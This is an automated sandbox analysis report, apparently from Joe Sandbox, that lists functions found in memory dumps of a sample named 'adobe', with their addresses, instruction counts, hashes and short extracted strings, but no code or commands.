Opcode ID: 454e93ffe970fad0c8ba01fbbdf4adefbc57eee19428c544fce30df6093e59fc
Instruction ID: 34a95d536e435d3c7fd6adb6361055cbd367289fa5a5305044956a0cfef8fa57
Opcode Fuzzy Hash: 454e93ffe970fad0c8ba01fbbdf4adefbc57eee19428c544fce30df6093e59fc
Instruction Fuzzy Hash: 5F322C34E1061ACBDB55EF75C99469DF7B2FFC9300F60865AD409AB364EB30A985CB80

Function 066F7DC8 Relevance: 3.0, Strings: 2, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 066F8105
$eq, xrefs: 066F8111

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: bd96d9560c2d3c092213d5dc8ae0e44cc665dffd2fd9064db8a3fb7ff6781000
Instruction ID: e4087dd8c8e903d52c67173c8f24c9d2e44a29fbf3d9e9e7f04dbb2f0e1ff71e
Opcode Fuzzy Hash: bd96d9560c2d3c092213d5dc8ae0e44cc665dffd2fd9064db8a3fb7ff6781000
Instruction Fuzzy Hash: 4F029E35B102058FDB54DB69D9507AEB7F2EF84300F148569E505DB3A9EB71ED82CB80

Function 066F55E8 Relevance: 1.8, Strings: 1, Instructions: 597
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 066F5939

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 17c6d48d12107eaad472695a5d5c527df96310e94c661a7f995bed6ecb9f32d1
Instruction ID: f58b1329ee5789787da89fb1e00d8117378b40485074557cd00f8531e2108829
Opcode Fuzzy Hash: 17c6d48d12107eaad472695a5d5c527df96310e94c661a7f995bed6ecb9f32d1
Instruction Fuzzy Hash: ED22E375E102159FDF64DBA4C5806AEBBB2FF85320F20846AE616EB354DB35EC41CB90

Function 066F6638 Relevance: .8, Instructions: 819COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74ee7e2257a0bbafe3b0ca0ed4c44a2adbac9cef06f4521075aa32403642867
Instruction ID: 7118fdf2b45e02011d909c8187d5d1444d9d179b784d90e9f1f110fb6464228f
Opcode Fuzzy Hash: d74ee7e2257a0bbafe3b0ca0ed4c44a2adbac9cef06f4521075aa32403642867
Instruction Fuzzy Hash: 1462BD34B202058FDB54DB68D594BADBBF2EF88310F248469E506EB395DB35EC42CB90

Function 066FC1D8 Relevance: .6, Instructions: 641COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a608657681bd42b0f9356cc89886adf7d00b8ef986370f3efc065d8ee9ccc878
Instruction ID: ba54354ddf298f928d3f1d92336940d52ff42fded86be4c9b439b5391ada9a1d
Opcode Fuzzy Hash: a608657681bd42b0f9356cc89886adf7d00b8ef986370f3efc065d8ee9ccc878
Instruction Fuzzy Hash: 17329E34F102098FDB54DB69D980BAEB7B2FB88310F108529E606EB395DB35EC45CB91

Function 066FB26F Relevance: .6, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e1f4e194c2b5af926e7b236e8cf2220d076c58fb5e415a0c2a23ff37c7fa4c
Instruction ID: 04ca1c8a434fa25622edde7fed39619af318b6466065fe83ccbc9ee2b7f65a2b
Opcode Fuzzy Hash: 58e1f4e194c2b5af926e7b236e8cf2220d076c58fb5e415a0c2a23ff37c7fa4c
Instruction Fuzzy Hash: 81229174F202098BDFA4DF69D5807AEB7B2EB49310F248426E505EB395DB35DC81CB91

Function 066FAD18 Relevance: 12.9, Strings: 10, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 066FAEF0
$eq, xrefs: 066FAE8C
$eq, xrefs: 066FAE39
$eq, xrefs: 066FAE98
XM, xrefs: 066FB1BA
$eq, xrefs: 066FAEE4
$eq, xrefs: 066FAEBB
$eq, xrefs: 066FAE45
XM, xrefs: 066FB0D9
$eq, xrefs: 066FAEC7

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: XM$XM$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-898559689
Opcode ID: c474acf8f482aa78d5c1f5f81c386bce1eb4e9c3177ed109d7d6243a7f882922
Instruction ID: ec2d2b7740b167b211c36770a8c8dc6ae81ff523d49b27767073e83c23194425
Opcode Fuzzy Hash: c474acf8f482aa78d5c1f5f81c386bce1eb4e9c3177ed109d7d6243a7f882922
Instruction Fuzzy Hash: A1E15F74E2020ACFDB55DBA9D5906AEB7B2FF89300F208529E509EB354DB319C46CB91

Function 066FB6A0 Relevance: 8.0, Strings: 6, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 066FBBF1
$eq, xrefs: 066FBC25
$eq, xrefs: 066FBBFD
$eq, xrefs: 066FBC59
$eq, xrefs: 066FBC65
$eq, xrefs: 066FBC31

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
Opcode ID: 9ea4be50e38e510632d9e0fd12f999cc95b5d3c3e0886d9c960a1366b657cab4
Instruction ID: fb537a1989a4363831c38749a39c16e63682d72eab0fe9f64630032536c4fb3a
Opcode Fuzzy Hash: 9ea4be50e38e510632d9e0fd12f999cc95b5d3c3e0886d9c960a1366b657cab4
Instruction Fuzzy Hash: 71026B70E202098FDFA4DF69D5806AEB7B2FB85310F24892AE515EB355DB31DC81CB91

Function 066F9198 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 066F91EB
$eq, xrefs: 066F91DF
$eq, xrefs: 066F921A
$eq, xrefs: 066F9226

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 9f0a21285411668db1f93d47a23443c54234f4a3e0ebb0f4dff3c910c07a89fc
Instruction ID: a9afe0d9f0414c72c408ddaf416ca0e4a1cbae32c94f84c02188f32a045a5646
Opcode Fuzzy Hash: 9f0a21285411668db1f93d47a23443c54234f4a3e0ebb0f4dff3c910c07a89fc
Instruction Fuzzy Hash: DF913B34F1060A8BDB54EF75D9507AEB7F6AB88300F108569D509EB398EB31ED818B91

Function 066FCFA0 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 066FD3AB
$eq, xrefs: 066FD397
$eq, xrefs: 066FD39F

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq
API String ID: 0-177832560
Opcode ID: 151efe0ec226035aa73afccca3f201efe3f35e5db008059f6c32402efd1f6c8f
Instruction ID: bc9301506186abd4df6e6a880d7517046e571052fc2a0b6da9e4ea463fa7fbbf
Opcode Fuzzy Hash: 151efe0ec226035aa73afccca3f201efe3f35e5db008059f6c32402efd1f6c8f
Instruction Fuzzy Hash: 3B625330A102068FCB55EB79D680A5EB7F2FF84304B108A68D1169F759EB75FD86CB81

Function 066F4BB0 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fjq, xrefs: 066F4BDB
\Ojq, xrefs: 066F4D8B
XPjq, xrefs: 066F4D01

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: fjq$XPjq$\Ojq
API String ID: 0-216941231
Opcode ID: 2d2d1c9b2100d27cde28fa61af82dd18ea8316edbc0d439cda668a274120840a
Instruction ID: ff75bb510d10c65da4ef18db7ffb62f143203d616c06c484c563dca0f50f0222
Opcode Fuzzy Hash: 2d2d1c9b2100d27cde28fa61af82dd18ea8316edbc0d439cda668a274120840a
Instruction Fuzzy Hash: AF617174F102089FEB549FB9D8547AEBAF6EF88300F208529E206EB395DF754D458B90

Function 066F9188 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 066F91DF
$eq, xrefs: 066F921A

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: 1e4c721f8a86d8a3c1e202270d3f095ee67add0b536c91a5c93ea0073717436a
Instruction ID: 463106e2d2a9f80fb7abb7addff9e99e4cc47da40205b94fc0b0a628450bce59
Opcode Fuzzy Hash: 1e4c721f8a86d8a3c1e202270d3f095ee67add0b536c91a5c93ea0073717436a
Instruction Fuzzy Hash: 91516134F115059FDB54EB74E950BAE73F6AB88310F108569D50AEB398EF31EC428B91

Function 066F4BA0 Relevance: 2.6, Strings: 2, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fjq, xrefs: 066F4BDB
XPjq, xrefs: 066F4D01

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: fjq$XPjq
API String ID: 0-1938862144
Opcode ID: dfeb28f3e23f39a7d6b848fed52fb99f1c4269aae1d8aa6e3a502462a747aeae
Instruction ID: ac8c5300ad7d84958a937965828863bcbf4a39b6cd59d54c536685d83daeb54b
Opcode Fuzzy Hash: dfeb28f3e23f39a7d6b848fed52fb99f1c4269aae1d8aa6e3a502462a747aeae
Instruction Fuzzy Hash: F8516174F102089FEB549FB5C854BAFBBF6EF88700F208529E106AB395DE759C458B90

Function 029CED40 Relevance: 1.6, APIs: 1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4036178019.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_29c0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a12dd49b4d6dff212806f8bb2e8cac8826497c019def0d487b3de54e030e0f60
Instruction ID: 3a00a7769789a488f1f4b0e74d9b8e2de626a2475ceefd6d4a0aee3d25445f71
Opcode Fuzzy Hash: a12dd49b4d6dff212806f8bb2e8cac8826497c019def0d487b3de54e030e0f60
Instruction Fuzzy Hash: A6412571D043499FCB14CFA9D8046AEBBF5EF89310F1585AAD404AB291DB749845CBE1

Function 029CEE28 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 029CEE8F

Memory Dump Source

Source File: 00000008.00000002.4036178019.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_29c0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f7a8934ace8a1950b2949e0fc570ba5c5b14dc9deb4562ada3a8348cd4d673a2
Instruction ID: c767cccaeb6322c9076b503700a576519d2090cae2f20589e0e3a115b85afbff
Opcode Fuzzy Hash: f7a8934ace8a1950b2949e0fc570ba5c5b14dc9deb4562ada3a8348cd4d673a2
Instruction Fuzzy Hash: 2D1120B1C006599FDB10CF9AC944BDEFBF8EF48320F15816AD818A7240D378A944CFA6

Function 066FDB15 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

PHeq, xrefs: 066FDC71

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: e374d28f72e1c2863d25a93c4023ba1e3c8a6c8b8d7f16b670dc5acb6beaffde
Instruction ID: 298d2ed777530060342bb103fffdfb3293c088872f8631c0163b7bee0b95ebbf
Opcode Fuzzy Hash: e374d28f72e1c2863d25a93c4023ba1e3c8a6c8b8d7f16b670dc5acb6beaffde
Instruction Fuzzy Hash: 6C419F70E106099FDB65DF75D4847AEBBB6BF85300F244929E505EB344EB70A846CB81

Function 066F2200 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHeq, xrefs: 066F233B

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: e23af465703e8317d11235edc440ed8ba5a7d68b7501e87e1a8877e6e82b9304
Instruction ID: 6d1f193db1a3682404b5653f1e60e120cb0ce80d98490e2b89ed1b2f92100ef9
Opcode Fuzzy Hash: e23af465703e8317d11235edc440ed8ba5a7d68b7501e87e1a8877e6e82b9304
Instruction Fuzzy Hash: 4931D271B102058FDB59ABB4D56466F7BF7AF89300F204428D506EB399EE36DE42CB90

Function 066F4A99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ojq, xrefs: 066F4AA5

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: \Ojq
API String ID: 0-1665755004
Opcode ID: 41918ec608ed31ed0b1fe9a9d6ba1b76926c11a1ebff54a4be0b04d9052f54e3
Instruction ID: b7d6e7629fba50a70852af5f2b09602e239103a66076415ca7e331f14aa8b8bd
Opcode Fuzzy Hash: 41918ec608ed31ed0b1fe9a9d6ba1b76926c11a1ebff54a4be0b04d9052f54e3
Instruction Fuzzy Hash: EDF0FE30E60129DFDB14DF94E999BAE7BF2FF84700F200529E102A7299CB741C05CB80

Function 066F277A Relevance: 1.0, Instructions: 1026COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37662ccf907271b7141ee38b65bfbc9529c7efac48d739d2d34db38f93b87eeb
Instruction ID: 23a04c90c03b77d90473265dad741afe98eb926a2e63d83a0d8cd409a7897420
Opcode Fuzzy Hash: 37662ccf907271b7141ee38b65bfbc9529c7efac48d739d2d34db38f93b87eeb
Instruction Fuzzy Hash: B1925434E102048FDBA4DBA8C594A5DBBF2FB48314F5484A9E509EB365DB35ED85CF80

Function 066F6230 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d083d81875d0b0282cf827ecbd2b74ab067f91bd93329c4aaca720ee89d649ab
Instruction ID: 14dc7790a3147965c14ea86e0d7a907c366c4f00d11297ea0b1352956a3e48df
Opcode Fuzzy Hash: d083d81875d0b0282cf827ecbd2b74ab067f91bd93329c4aaca720ee89d649ab
Instruction Fuzzy Hash: 2B61B271F100114FDF509B7EC88066FAAD7AFD4220B254439E90AEB364DEAADD0287C1

Function 066F42E2 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075675aee74f7703571c7a1edeb7aef850da5c861e4d75d2a86a0364e206016f
Instruction ID: bf0ea654b598de323d52e6f9fa24c51f038ba1ed61ea352df56aec6225066987
Opcode Fuzzy Hash: 075675aee74f7703571c7a1edeb7aef850da5c861e4d75d2a86a0364e206016f
Instruction Fuzzy Hash: 2B815A34B106098BDB54EFA9D5507AEB7F3EB88300F108529D50AEB799EF34DC428B91

Function 066F4600 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512fa96f7d7aade4b33003a314b77ca84ab98791def6e63cc889f2b643a43dca
Instruction ID: c12b4019a4cace1fb9faaa269094562a18d8535bd75b4d97bf6558ada690cf57
Opcode Fuzzy Hash: 512fa96f7d7aade4b33003a314b77ca84ab98791def6e63cc889f2b643a43dca
Instruction Fuzzy Hash: 42913E70E102199FDF50DF65C840B9AB7B1FF85300F208599E549BB395DB70AA85CF91

Function 066F4618 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e5f8fc82f12b3412b6eed27cd70a6babc5278eebd9115b372a4ab6e98053176
Instruction ID: 91ef4f23c4260a3a7f54ee3ac7430c12b71b731e01f449a6e51ee48572b82c89
Opcode Fuzzy Hash: 5e5f8fc82f12b3412b6eed27cd70a6babc5278eebd9115b372a4ab6e98053176
Instruction Fuzzy Hash: EA914F70E102198BDF60DF65C840B9EB7B1FF89300F208599E549BB395EB70AA85CF90

Function 066FEF78 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b861334a767b417b763fc517dbf5660bd754e40b93144a47b1480f018fb3ffe
Instruction ID: 4a55eb078e0c18b7454d5d07aee025f2a1ea4bc5d7764714a50cdb50fb498802
Opcode Fuzzy Hash: 5b861334a767b417b763fc517dbf5660bd754e40b93144a47b1480f018fb3ffe
Instruction Fuzzy Hash: B3715B70A102099FDB54DFA9D980A9EBBF6FF88300F248529E105EB365DB30ED46CB41

Function 066FEF88 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862da766c85969f56d974122370dcf70933f394ec7180c96e2e6eddb34aee257
Instruction ID: 72923115e7b5b53eacabfaeff969304b1d2bd7965f0c6ab7cc17c1e1df35a59b
Opcode Fuzzy Hash: 862da766c85969f56d974122370dcf70933f394ec7180c96e2e6eddb34aee257
Instruction Fuzzy Hash: F7714B70A102099FDB54DFA9D980A9EBBF6FF88304F248529E505EB365DB30ED46CB41

Function 066FFC11 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8052169679978363cbb5cd4e006a648db6aff7ffb75d93ace842b1c2ee1f8ec3
Instruction ID: 5707c02ea325e83a58e539e83cbac1a796387da4e63bae084c1a9b9aa1e185c3
Opcode Fuzzy Hash: 8052169679978363cbb5cd4e006a648db6aff7ffb75d93ace842b1c2ee1f8ec3
Instruction Fuzzy Hash: FE51E131E10109DFDF64EB78E4946AEBBB2FF85315F108869E206DB354DB319855CB80

Function 066FF9C1 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2eaa50fc7622ae24929bc515ad883f59c9008f795c0e9588060abb1bcb7d42
Instruction ID: 1a88ddaa232b60252a804168c25a5d5b8ccde5b893240445a1ac735494aaadcf
Opcode Fuzzy Hash: ab2eaa50fc7622ae24929bc515ad883f59c9008f795c0e9588060abb1bcb7d42
Instruction Fuzzy Hash: A051C570B301149FEFA467BCD95477F369AD789310F20482AE60ADB7D9CA78CC858792

Function 066FF9D0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926674fc2d21a5a3084beefb6184646538215e22353fcd632160569747c4c715
Instruction ID: f8b309c731ab94a6495806ffe32f11f8da75a107efeed6097b4fbcd4dd6096be
Opcode Fuzzy Hash: 926674fc2d21a5a3084beefb6184646538215e22353fcd632160569747c4c715
Instruction Fuzzy Hash: 2951D570B301048BEFA467BDD95473F369AD789310F20482AE60ADB799CE78CC858792

Function 066F55D8 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c732d5a4c3658cf59c86a5b8776e4a49bc1a03b39ec65da52f6555085a4eb8
Instruction ID: 2a7834588d61632b5226ff9c9a4e467119ab6a065616e111abd1d23a48bdf5b4
Opcode Fuzzy Hash: 67c732d5a4c3658cf59c86a5b8776e4a49bc1a03b39ec65da52f6555085a4eb8
Instruction Fuzzy Hash: 9C51A374E202059FDF718B69C48077EBBB2EB55310F24882AE26BDB395C635EC41CB91

Function 066F545A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59925fa9f8ff8d1a59ebf936e533df6af333f2bf6ac2fb3fb8720ad9e34ef58e
Instruction ID: e19bddf650721caa25932b62b000c6d521c104edcc76891fe62a5751ab8f6cd9
Opcode Fuzzy Hash: 59925fa9f8ff8d1a59ebf936e533df6af333f2bf6ac2fb3fb8720ad9e34ef58e
Instruction Fuzzy Hash: 23413C71E106099FDF70CFA9D881AAFBBB2FB95310F10492AE216D7650D330ED598B91

Function 066FD9C8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6793eeed6c8190b367546db56bccbffaf7b63a57ee391b72af57f73370a04c9
Instruction ID: 0dc2125fc969cb340e045acc9f27c1ead2e160200d1ddf71aca049a29c17f0d6
Opcode Fuzzy Hash: b6793eeed6c8190b367546db56bccbffaf7b63a57ee391b72af57f73370a04c9
Instruction Fuzzy Hash: 3731EC30E142099BDB64DF75D58069EB7F2FF45304F104929E501EB344EB70B946CB84

Function 066F20B0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cdfa82475e76087032a34b0419e8c048e40795f7b92fe9f05ef5587fe64de43
Instruction ID: 7a572a04ed932ed8ed5e02cbf5512691776b1f10165101ed09fd6e79d3f3210c
Opcode Fuzzy Hash: 1cdfa82475e76087032a34b0419e8c048e40795f7b92fe9f05ef5587fe64de43
Instruction Fuzzy Hash: 2431D230E102059FDB05CFA4D964A9EBBF6BF89300F108529EA16EB354DB30AD42CB90

Function 066F20C0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e6d83b81c675e9b68ae1f28d875315bc59f15d836cd38d29e0f3808e50a6517
Instruction ID: 56f6c410031e5ace3f52a27b9d0fa2cb9a03e1a16079546ab83aeb3c9dc0dcbe
Opcode Fuzzy Hash: 1e6d83b81c675e9b68ae1f28d875315bc59f15d836cd38d29e0f3808e50a6517
Instruction Fuzzy Hash: 4131A030E102099BCB54DFA4D96469EB7F6BF89300F108529EA16EB350EB71AD42CB90

Function 066F3EE9 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d07feb0b0cb6889d70214e1517178bd848fa3456deee063d8314a0f9516073
Instruction ID: 96a5bcaa5ca16577db757a69c2b6e7cb991c8c28291fbbd447a4600f0a20ffd9
Opcode Fuzzy Hash: 24d07feb0b0cb6889d70214e1517178bd848fa3456deee063d8314a0f9516073
Instruction Fuzzy Hash: C0219CB9F512159FDB50DFA9DA40BAEBBF1EB88310F148029EA05E7354E734DC018B90

Function 066F3EF8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0ac7a9b6698ef753e22e094dfdff24e388fac5f5398e01afd7ca141ba0c31d
Instruction ID: 96012b15fb48f8995e57259466893fc702afed8b12001525e35d807ceb58fffc
Opcode Fuzzy Hash: 8c0ac7a9b6698ef753e22e094dfdff24e388fac5f5398e01afd7ca141ba0c31d
